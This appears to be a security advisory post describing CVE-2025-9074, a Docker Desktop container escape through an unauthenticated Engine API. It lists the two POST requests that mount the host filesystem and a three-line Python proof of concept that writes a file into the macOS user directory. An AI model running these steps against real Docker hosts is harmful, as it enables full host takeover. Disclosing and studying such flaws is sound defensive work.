CVE-2025-9074: Simple SSRF Leads to Complete Docker Escape

Published Date: August 26, 2025

Category: ShadowOpsIntel

CVE-2025-9074 is a severe security weakness affecting Docker Desktop on Windows and macOS. It allows attackers to escape from containers and gain full control of the host machine by abusing an unauthenticated Docker Engine API socket exposed on the private Docker network.

Discovered in mid-2025 by researchers Felix Boulet and Philippe Dugre, the flaw demonstrated how basic trust assumptions in Docker’s isolation could be broken with minimal effort.

Severity Level: Critical

Vulnerability Details

CVE ID: CVE-2025-9074
CVSS Score: 9.3
The Docker Engine API (http[:]//192.168.65[.]7:2375/) was accessible without authentication to workloads running inside containers. This API exposed powerful management functions (create, delete containers, mount volumes, access host filesystem). As a result, any container could manipulate the Docker host directly, bypassing isolation.
Impact varied by platform:
- Windows – critical, allows full host takeover with admin privileges.
- macOS – limited impact due to extra permission prompts, but still allowed Docker manipulation and backdooring.
- Linux – not vulnerable under default configurations since it uses a Unix named pipe rather than a TCP socket.

Exploitation Of The Vulnerability

From inside any container exploitation requires only two HTTP POST requests:
- POST to /containers/create → bind host filesystem (e.g., C:) into a container.
- POST to /containers/{id}/start → launch the container and start the execution.
On macOS, the exploitation requires only 3 lines of python code. Example:
- import docker
- client = docker.DockerClient(base_url=”tcp://192.168.65.7:2375″)
- client.containers.run(“alpine”, “touch /mnt/pwned”, volumes=[“/Users//:/mnt”])